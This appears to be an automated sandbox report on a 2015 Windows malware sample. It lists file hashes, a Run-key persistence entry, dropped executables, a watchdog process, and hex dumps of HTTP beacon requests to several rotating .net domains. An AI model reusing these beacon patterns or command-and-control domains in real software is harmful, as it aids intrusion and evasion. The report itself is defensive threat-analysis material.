Analysis Date2015-05-12 22:24:06

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6bec07fe9346382393eaa860b1b978cc sha1: ae74a0bc782a4ef36d903e9bf4b65cc4ad336c91 size: 299008
Section.rdata md5: 57e7aeb8f32201572b1c946ab0ea2c02 sha1: 48cc25461cf837c68c9a91b02f3101bb04e9c865 size: 35840 md5: 073095ddaab6f51e715fcad070180579 sha1: 4791104e050861a0255337937b21bc79f3e2d6f6 size: 95232
Timestamp2014-10-30 09:49:37
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\User Extender Name Auto Collector Port Security ➝
C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe

↳ C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\sxxuywqqp.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.vz
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\mjnqqqknuzlna\eoysabvthxjx.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝
Flows TCP192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 74726164   lose..Host: trad
0x00000070 (00112)   65736574 746c652e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73747265   lose..Host: stre
0x00000070 (00112)   65746465 76696365 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 62657474   lose..Host: bett
0x00000070 (00112)   65726465 76696365 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 666c6965   lose..Host: flie
0x00000070 (00112)   72626566 6f72652e 6e65740d 0a0d0a0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 6e696768   lose..Host: nigh
0x00000070 (00112)   74737072 696e672e 6e65740d 0a0d0a0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 63617074   lose..Host: capt
0x00000070 (00112)   61696e73 75636365 73732e6e 65740d0a
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 656c6563   lose..Host: elec
0x00000070 (00112)   74726963 73707269 6e672e6e 65740d0a
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 74726164   lose..Host: trad
0x00000070 (00112)   65737072 696e672e 6e65740d 0a0d0a0a
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73747265   lose..Host: stre
0x00000070 (00112)   65747375 63636573 732e6e65 740d0a0d
0x00000080 (00128)   0a0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 73747265   lose..Host: stre
0x00000070 (00112)   65746261 6e6b6572 2e6e6574 0d0a0d0a
0x00000080 (00128)   0a0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 616c6d73 406d6574   mail=metalms@met
0x00000020 (00032)   616c6d73 2e636f6d 2e627226 6d657468
0x00000030 (00048)   6f643d70 6f737426 6c656e20 48545450   od=post&len HTTP
0x00000040 (00064)   2f312e30 0d0a4163 63657074 3a202a2f   /1.0..Accept: */
0x00000050 (00080)   2a0d0a43 6f6e6e65 6374696f 6e3a2063   *..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 62657474   lose..Host: bett
0x00000070 (00112)   65727375 63636573 732e6e65 740d0a0d
0x00000080 (00128)   0a                                    .

@E8E,E E
         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
-~zUueofte xhn olifnimmn qpme dzg rrojegof gcafu mklui fghi kde fcqenrejuf iworvuo ayn ikejlopfm azgyizfito tip pbeepuz bedaz ebdme kblocrno yycoa jqsi psbesqay ftbewitg dsjedm fagjiasm iczubusd legjojjn qvoyakv cgcecjr zstilycemr abdcejiab syfomjz gkgik jcqieakrsa pfn uvfb eaepngukfs gagtufpm jrsidsn pur efczolvb ncb gcsegrmu dnjubhga sgs qgfodf wngeonmp yeasvedq yimb ngcaiegb dpbescje gnbaiunb lzeekobjn npr rbcujnie lmheuqoz pyf umspodpuoe cunarapgm ixni rrbujsef felzom znriefmjoz khj kfsunzma ftyef